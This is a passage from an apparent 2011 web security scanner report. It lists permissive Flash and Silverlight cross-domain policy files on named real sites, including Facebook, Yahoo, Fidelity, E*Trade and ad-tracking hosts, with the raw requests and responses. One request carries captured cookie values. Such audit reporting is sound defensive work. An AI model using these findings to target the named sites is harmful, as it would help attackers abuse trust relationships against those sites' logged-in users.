GET /crossdomain.xml HTTP/1.0
Host: shopping.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 17 Jun 2010 15:57:01 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/x-httpd-template

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.84. http://sports.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sports.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host
Last-Modified: Mon, 28 Sep 2009 17:09:24 GMT
Accept-Ranges: bytes
Content-Length: 346
Content-Type: application/xml
Age: 0
Via: HTTP/1.1 r5.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mlb.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" secure="false" />
...[SNIP]...

3.85. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:41 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.86. https://us.etrade.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.etrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:08 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 16:10:27 GMT
ETag: "119-4cbdc2f3"
Accept-Ranges: bytes
Content-Length: 281
Keep-Alive: timeout=60, max=399
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.etrade.com" />
<allow-access-from domain="a248.e.akamai.net" />
<allow-access-from domain="*.etradegrp.com" />
...[SNIP]...

3.87. http://video.music.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: video.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://d.yimg.com/m/up/fop/embedflv/swf/fop.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Thu, 11 Mar 2010 22:48:23 GMT
Accept-Ranges: bytes
Content-Length: 1119
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:
...[SNIP]...
<allow-access-from domain="*.yahoo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.broadcast.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.launch.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.rivals.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.hotjobs.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.yahooligans.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.overture.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.flickr.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vap.yahoo.net" secure="true" />
...[SNIP]...

3.88. http://www.comcast.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.comcast.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.58 (Unix)
Last-Modified: Tue, 14 Sep 2010 01:19:26 GMT
ETag: "25d5d5-444-f82380"
Accept-Ranges: bytes
Content-Length: 1092
Content-Type: application/xml
Cache-Control: max-age=2592000
Date: Tue, 06 Sep 2011 12:22:14 GMT
Connection: close

<?xml version="1.0"?>

<!--static-->

<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.xfinity.com"/>
<allow-access-from domain="*.fancast.com"/>
<allow-access-from domain="beta.comcast.net" />
<allow-access-from domain="*.cimcontent.net" />
<allow-access-from domain="chrome.comcast.net" />
<allow-access-from domain="static.comcast.net" />
<allow-access-from domain="por-img.cimcontent.net" />
<allow-access-from domain="comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcastonline.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.att.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.xcal.tv" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.teamcomcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...

3.89. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.23.37
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.90. http://www.fidelity.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fidelity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Mon, 30 Jul 2007 18:35:02 GMT
Content-Length: 256
ETag: "100-46ae2f56"
Accept-Ranges: bytes
Date: Tue, 06 Sep 2011 12:48:34 GMT
Connection: close
Set-Cookie: v1st=F13F975838C16CC; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fidelity.com

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fidelity.com" />
<allow-access-from domain="*.fmr.com" />
...[SNIP]...

3.91. https://www.fidelity.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.fidelity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Mon, 30 Jul 2007 18:35:02 GMT
ETag: W/"100-46ae2f56"
Date: Tue, 06 Sep 2011 12:48:57 GMT
Content-Length: 256
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fidelity.com" />
<allow-access-from domain="*.fmr.com" />
...[SNIP]...

3.92. http://www.pgatour.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pgatour.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:27 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 18:42:40 GMT
Accept-Ranges: bytes
Content-Length: 1831
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="pga-livescoring.chester.contentproject.com"/>
   <allow-access-from domain="*.pgatour.com"/>
   <allow-access-from domain="*.pga.com"/>
   <allow-access-from domain="i.cdn.turner.com"/>
   <allow-access-from domain="*.cnn.com"/>
   <allow-access-from domain="*.turner.com"/>
   <allow-access-from domain="*.cnn.net"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
   <allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="*.2mdn.net"/>
   <allow-access-from domain="*.i-traffic.com"/>
   <allow-access-from domain="ar.atwola.com"/>
   <allow-access-from domain="*.itraffic.com"/>
   <allow-access-from domain="*.agency.com"/>
   <allow-access-from domain="*.aol.com"/>
   <allow-access-from domain="*.time.com"/>
   <allow-access-from domain="*.VillageVoice.com"/>
   <allow-access-from domain="*.nymag.com"/>
   <allow-access-from domain="*. salon.com"/>
   <allow-access-from domain="*.secondthought.com"/>
   <allow-access-from domain="*.clk4.com"/>
   <allow-access-from domain="servedby.advertising.com"/>
   <allow-access-from domain="bannerfarm.advertising.com"/>
   <allow-access-from domain="*.advertising.com"/>
   <allow-access-from domain="*.crewintegrated.com"/>
   <allow-access-from domain="gfx.klipmart.com"/>
   <allow-access-from domain="*.klipmart.com"/>
   <allow-access-from domain="*.viewpoint.com"/>
   <allow-access-from domain="*.unicast.com"/>
   <allow-access-from domain="*.go123ov.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.majorschampionships.com"/>
...[SNIP]...

3.93. http://xfinity.comcast.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xfinity.comcast.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: xfinity.comcast.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.58 (Unix)
Last-Modified: Tue, 14 Sep 2010 01:19:26 GMT
ETag: "25d5d5-444-f82380"
Accept-Ranges: bytes
Content-Length: 1092
Content-Type: application/xml
Cache-Control: max-age=2592000
Date: Tue, 06 Sep 2011 12:22:13 GMT
Connection: close

<?xml version="1.0"?>

<!--static-->

<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.xfinity.com"/>
<allow-access-from domain="*.fancast.com"/>
<allow-access-from domain="beta.comcast.net" />
<allow-access-from domain="*.cimcontent.net" />
<allow-access-from domain="chrome.comcast.net" />
<allow-access-from domain="static.comcast.net" />
<allow-access-from domain="por-img.cimcontent.net" />
<allow-access-from domain="comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcastonline.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.att.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.xcal.tv" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.teamcomcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...

3.94. http://www.vonage.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:08 GMT
Server: Apache
Last-Modified: Thu, 21 Feb 2008 11:50:31 GMT
ETag: "a5474d-bf-446a9b66f2fc0"
Accept-Ranges: bytes
Content-Length: 191
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="www.vonage-media.co.uk" />
<allow-access-from domain="vonage-media.co.uk" />
</cross-domain-policy>

4. Silverlight cross-domain policy  previous  next
There are 15 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ads.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:16c4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:45:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.2. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 12:45:57 GMT
Date: Tue, 06 Sep 2011 12:45:57 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.3. http://citizenstelecom.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://citizenstelecom.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: citizenstelecom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:44 GMT
Server: Omniture DC/2.0.0
xserver: www69
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.4. http://ec.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Age: 283499
Date: Tue, 06 Sep 2011 12:48:17 GMT
Expires: Sat, 10 Sep 2011 06:03:18 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.5. http://integrate.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://integrate.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Omniture DC/2.0.0
xserver: www56
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.6. http://metrics.scottrade.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.scottrade.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.scottrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:47 GMT
Server: Omniture DC/2.0.0
xserver: www168
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.7. http://metrics.vonage.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:49 GMT
Server: Omniture DC/2.0.0
xserver: www5
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.8. http://pixel.quantserve.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:29 GMT
Content-Type: text/xml
Content-Length: 312
Date: Tue, 06 Sep 2011 12:45:29 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

4.9. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 05 Sep 2011 19:52:39 GMT
Expires: Tue, 06 Sep 2011 19:52:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
